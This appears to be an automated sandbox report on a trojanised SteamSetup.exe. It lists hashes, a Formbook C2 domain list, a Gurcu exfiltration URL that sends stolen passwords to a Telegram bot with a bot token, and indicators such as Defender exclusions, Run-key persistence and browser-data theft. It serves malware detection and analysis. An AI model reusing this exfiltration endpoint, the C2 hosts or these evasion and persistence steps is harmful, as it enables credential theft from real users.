Overview
overview
10Static
static
1SteamSetup.exe
windows7-x64
6SteamSetup.exe
windows10-2004-x64
6$PLUGINSDI...ls.dll
windows7-x64
3$PLUGINSDI...ls.dll
windows10-2004-x64
3$PLUGINSDI...em.dll
windows7-x64
3$PLUGINSDI...em.dll
windows10-2004-x64
3$PLUGINSDI...gs.dll
windows7-x64
3$PLUGINSDI...gs.dll
windows10-2004-x64
10$PLUGINSDI...ec.dll
windows7-x64
3$PLUGINSDI...ec.dll
windows10-2004-x64
3$PLUGINSDI...ss.dll
windows7-x64
3$PLUGINSDI...ss.dll
windows10-2004-x64
3Steam.exe
windows7-x64
4Steam.exe
windows10-2004-x64
5bin/SteamService.exe
windows7-x64
1bin/SteamService.exe
windows10-2004-x64
1uninstall.exe
windows7-x64
4uninstall.exe
windows10-2004-x64
4$PLUGINSDI...LL.dll
windows7-x64
3$PLUGINSDI...LL.dll
windows10-2004-x64
3$PLUGINSDI...nk.dll
windows7-x64
3$PLUGINSDI...nk.dll
windows10-2004-x64
3$PLUGINSDI...ec.dll
windows7-x64
3$PLUGINSDI...ec.dll
windows10-2004-x64
3Analysis
-
max time kernel
1015s -
max time network
1015s -
platform
windows10-2004_x64 -
resource
win10v2004-20250129-en -
resource tags
arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system -
submitted
05-02-2025 10:17
Static task
static1
Behavioral task
behavioral1
Sample
SteamSetup.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
SteamSetup.exe
Resource
win10v2004-20250129-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/StdUtils.dll
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/StdUtils.dll
Resource
win10v2004-20250129-en
Behavioral task
behavioral5
Sample
$PLUGINSDIR/System.dll
Resource
win7-20241010-en
Behavioral task
behavioral6
Sample
$PLUGINSDIR/System.dll
Resource
win10v2004-20250129-en
Behavioral task
behavioral7
Sample
$PLUGINSDIR/nsDialogs.dll
Resource
win7-20240729-en
Behavioral task
behavioral8
Sample
$PLUGINSDIR/nsDialogs.dll
Resource
win10v2004-20250129-en
Behavioral task
behavioral9
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20241010-en
Behavioral task
behavioral10
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20250129-en
Behavioral task
behavioral11
Sample
$PLUGINSDIR/nsProcess.dll
Resource
win7-20240903-en
Behavioral task
behavioral12
Sample
$PLUGINSDIR/nsProcess.dll
Resource
win10v2004-20250129-en
Behavioral task
behavioral13
Sample
Steam.exe
Resource
win7-20240903-en
Behavioral task
behavioral14
Sample
Steam.exe
Resource
win10v2004-20250129-en
Behavioral task
behavioral15
Sample
bin/SteamService.exe
Resource
win7-20241010-en
Behavioral task
behavioral16
Sample
bin/SteamService.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral17
Sample
uninstall.exe
Resource
win7-20240903-en
Behavioral task
behavioral18
Sample
uninstall.exe
Resource
win10v2004-20250129-en
Behavioral task
behavioral19
Sample
$PLUGINSDIR/LangDLL.dll
Resource
win7-20240903-en
Behavioral task
behavioral20
Sample
$PLUGINSDIR/LangDLL.dll
Resource
win10v2004-20250129-en
Behavioral task
behavioral21
Sample
$PLUGINSDIR/ShellLink.dll
Resource
win7-20240903-en
Behavioral task
behavioral22
Sample
$PLUGINSDIR/ShellLink.dll
Resource
win10v2004-20250129-en
Behavioral task
behavioral23
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20240708-en
Behavioral task
behavioral24
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20250129-en
General
-
Target
$PLUGINSDIR/nsDialogs.dll
-
Size
20KB
-
MD5
4e5bc4458afa770636f2806ee0a1e999
-
SHA1
76dcc64af867526f776ab9225e7f4fe076487765
-
SHA256
91a484dc79be64dd11bf5acb62c893e57505fcd8809483aa92b04f10d81f9de0
-
SHA512
b6f529073a943bddbcb30a57d62216c78fcc9a09424b51ac0824ebfb9cac6cae4211bda26522d6923bd228f244ed8c41656c38284c71867f65d425727dd70162
-
SSDEEP
384:ABSzm+t18pZ0WAg0RhIFgnGNyQH38E9VF6IYinAM+oZfNRoZk:NupZ/Ag0/T8MEpYinAMxZ7oW
Malware Config
Extracted
formbook
4.1
a01d
eniorshousing05.shop
rywisevas.biz
4726.pizza
itchen-design-42093.bond
3456.tech
4825.plus
nlinecraps.xyz
itamins-52836.bond
nfluencer-marketing-40442.bond
nline-advertising-58573.bond
rautogroups.net
limbtrip.net
oftware-download-14501.bond
nline-advertising-66733.bond
erity.xyz
xknrksi.icu
x-ist.club
yber-security-26409.bond
oincatch.xyz
onitoring-devices-34077.bond
hbvc.xyz
xecadminadvo.vip
ookers.homes
irlypods.shop
nalyzator.fun
rinciple.press
ejigghq.company
nity-officiels.shop
chtm.info
ggrupdanismanlik.online
alterjaviersemolic.online
6zc.lat
ukce.fun
ikretgunay.online
d8ns7gu.skin
06ks7.club
icovideo.voyage
nlinetutoringcanada776681.icu
etzero.icu
228080a0.buzz
agoslotoke.art
ruaim.online
nline-mba-87219.bond
oldsaver.biz
agonel.online
ommbank.video
indlab.shop
hesweettray.store
bilebe.info
uxemasculine.store
arkbarron.xyz
ektor.fun
8255.pizza
ike-loans-53803.bond
ong-ya.info
costcomembers-wholesale.online
75396.vip
leaning-services-53131.bond
uickcabinet.net
alifstorch.online
ahtel.net
usinessoverpleasure.shop
duway.pro
usiness-software-47704.bond
ustonehuman.info
Extracted
gurcu
https://api.telegram.org/bot7640909551:AAGr64V1_buwzMrphxWr0zMKzK8B2OBPSL0/sendDocument?chat_id=5884046747&caption=Admin%20/%20Passwords%20/%20181.215.176.8
Signatures
-
Formbook family
-
Gurcu family
-
Formbook payload 2 IoCs
resource yara_rule behavioral8/memory/452-1536-0x0000000000400000-0x000000000042F000-memory.dmp formbook behavioral8/memory/1084-1592-0x0000000000370000-0x000000000039F000-memory.dmp formbook -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 940 powershell.exe 3232 powershell.exe 2880 powershell.exe 3036 powershell.exe 1676 powershell.exe 4304 powershell.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 PING.EXE Key opened \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 PING.EXE Key opened \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 PING.EXE -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\GBCX6TFP = "C:\\Program Files (x86)\\Nybgh8\\configufgxdx.exe" mstsc.exe -
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 305 reallyfreegeoip.org 309 reallyfreegeoip.org 302 checkip.dyndns.org 304 reallyfreegeoip.org -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000\Control Panel\International\Geo\Nation a7fc129cd3069c3c862c28990c131e3dae5fff42c5ab8cb034e8e8ea12bec94e.exe Key value queried \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000\Control Panel\International\Geo\Nation a7fc129cd3069c3c862c28990c131e3dae5fff42c5ab8cb034e8e8ea12bec94e.exe -
Drops file in System32 directory 11 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.jfm svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.log svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSStmp.log svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00002.jrs svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jcp svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jtx svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00001.jrs svchost.exe -
Suspicious use of SetThreadContext 18 IoCs
description pid Process procid_target PID 4660 set thread context of 452 4660 a7fc129cd3069c3c862c28990c131e3dae5fff42c5ab8cb034e8e8ea12bec94e.exe 187 PID 452 set thread context of 3528 452 RegSvcs.exe 56 PID 1084 set thread context of 3528 1084 mstsc.exe 56 PID 1340 set thread context of 1688 1340 a7fc129cd3069c3c862c28990c131e3dae5fff42c5ab8cb034e8e8ea12bec94e.exe 199 PID 1688 set thread context of 3528 1688 RegSvcs.exe 56 PID 1084 set thread context of 1124 1084 mstsc.exe 100 PID 1084 set thread context of 1740 1084 mstsc.exe 121 PID 1084 set thread context of 3416 1084 mstsc.exe 122 PID 1084 set thread context of 2740 1084 mstsc.exe 123 PID 1084 set thread context of 5072 1084 mstsc.exe 124 PID 1084 set thread context of 348 1084 mstsc.exe 125 PID 1084 set thread context of 2912 1084 mstsc.exe 127 PID 1084 set thread context of 4248 1084 mstsc.exe 142 PID 1084 set thread context of 4196 1084 mstsc.exe 143 PID 1084 set thread context of 4980 1084 mstsc.exe 145 PID 1084 set thread context of 656 1084 mstsc.exe 146 PID 1084 set thread context of 4064 1084 mstsc.exe 147 PID 1084 set thread context of 2236 1084 mstsc.exe 148 -
Drops file in Program Files directory 4 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Nybgh8\configufgxdx.exe Explorer.EXE File opened for modification C:\Program Files (x86)\Nybgh8\configufgxdx.exe mstsc.exe File opened for modification C:\Program Files (x86)\Nybgh8 Explorer.EXE File created C:\Program Files (x86)\Nybgh8\configufgxdx.exe Explorer.EXE -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log mspaint.exe -
Executes dropped EXE 3 IoCs
pid Process 4660 a7fc129cd3069c3c862c28990c131e3dae5fff42c5ab8cb034e8e8ea12bec94e.exe 1340 a7fc129cd3069c3c862c28990c131e3dae5fff42c5ab8cb034e8e8ea12bec94e.exe 1224 configufgxdx.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 2880 1932 WerFault.exe 86 -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
System Location Discovery: System Language Discovery 1 TTPs 16 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a7fc129cd3069c3c862c28990c131e3dae5fff42c5ab8cb034e8e8ea12bec94e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language systray.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language configufgxdx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a7fc129cd3069c3c862c28990c131e3dae5fff42c5ab8cb034e8e8ea12bec94e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mstsc.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 3036 cmd.exe 1964 PING.EXE 2336 cmd.exe 3756 PING.EXE -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe -
Checks processor information in registry 2 TTPs 18 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe -
Enumerates system info in registry 2 TTPs 18 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Kills process with taskkill 2 IoCs
pid Process 1408 taskkill.exe 4996 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000\Software\Microsoft\Internet Explorer\Toolbar Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" Explorer.EXE Key created \Registry\User\S-1-5-21-2211717155-842865201-3404093980-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 mstsc.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133832242721285106" chrome.exe -
Modifies registry class 35 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{B3690E58-E961-423B-B687-386EBFD83239} Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{B3690E58-E961-423B-B687-386EBFD83239}\GroupByKey:PID = "0" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{B3690E58-E961-423B-B687-386EBFD83239}\Vid = "{0057D0E0-3573-11CF-AE69-08002B2E1262}" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6 Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\SniffedFolderType = "Pictures" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000_Classes\Local Settings mspaint.exe Set value (int) \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{B3690E58-E961-423B-B687-386EBFD83239}\IconSize = "96" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{B3690E58-E961-423B-B687-386EBFD83239}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 020000000100000000000000ffffffff Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\MRUListEx = ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{B3690E58-E961-423B-B687-386EBFD83239}\GroupByDirection = "1" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{B3690E58-E961-423B-B687-386EBFD83239}\Mode = "1" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\HotKey = "0" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{B3690E58-E961-423B-B687-386EBFD83239}\GroupView = "0" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{B3690E58-E961-423B-B687-386EBFD83239}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000050000001800000030f125b7ef471a10a5f102608c9eebac0a000000a0000000b474dbf787420341afbaf1b13dcd75cf64000000a000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000e0859ff2f94f6810ab9108002b27b3d90500000058000000 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2 = 14002e80d43aad2469a5304598e1ab02f9417aa80000 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{B3690E58-E961-423B-B687-386EBFD83239}\Rev = "0" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{B3690E58-E961-423B-B687-386EBFD83239}\FFlags = "1092616193" Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\NodeSlot = "6" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{B3690E58-E961-423B-B687-386EBFD83239}\LogicalViewMode = "3" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{B3690E58-E961-423B-B687-386EBFD83239}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE -
NTFS ADS 3 IoCs
description ioc Process File created C:\Users\Admin\Downloads\0c9e474f7402c958fe8c3cedb97a4830a67599f7a2766aee93cd0c41943db0c1.zip:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\a7fc129cd3069c3c862c28990c131e3dae5fff42c5ab8cb034e8e8ea12bec94e.zip:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\e05390c002d75c6207dc490d9984b38cb095515bb2243be26b9c0fbe6ef2eff3.zip:Zone.Identifier firefox.exe -
Runs ping.exe 1 TTPs 2 IoCs
pid Process 1964 PING.EXE 3756 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2384 schtasks.exe 4408 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 3 IoCs
pid Process 220 EXCEL.EXE 2352 EXCEL.EXE 3528 Explorer.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
